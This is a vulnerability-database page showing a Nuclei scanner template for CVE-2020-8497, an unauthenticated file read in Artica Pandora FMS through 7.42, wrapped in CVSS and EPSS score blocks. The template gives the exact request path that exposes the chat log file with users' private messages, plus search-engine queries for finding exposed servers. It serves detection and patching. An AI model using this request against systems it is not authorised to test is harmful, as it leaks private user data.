Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-8497
HistoryDec 05, 2021 - 11:36 p.m.

Artica Pandora FMS <=7.42 - Arbitrary File Read

2021-12-0523:36:14
ProjectDiscovery
github.com
6

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.2 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

57.7%

Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.

id: CVE-2020-8497

info:
  name: Artica Pandora FMS <=7.42 - Arbitrary File Read
  author: gy741
  severity: medium
  description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
  remediation: |
    Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability.
  reference:
    - https://k4m1ll0.com/cve-2020-8497.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8497
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-8497
    cwe-id: CWE-306
    epss-score: 0.002
    epss-percentile: 0.56881
    cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: artica
    product: pandora_fms
    shodan-query: http.title:"pandora fms"
    fofa-query: title="pandora fms"
    google-query: intitle:"pandora fms"
  tags: cve,cve2020,fms,artica

http:
  - method: GET
    path:
      - '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"type"'
          - '"id_user"'
          - '"user_name"'
          - '"text"'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220525b0394b9d3a28ef8154f941916bbd498f3cdbe8f8a1f5b006ba60e63d2f8b3022100e2246c5df27c07e8483bda40820890e1c9465dc46f0b26a5a28304d4c9780775:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.2 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

57.7%

Related for NUCLEI:CVE-2020-8497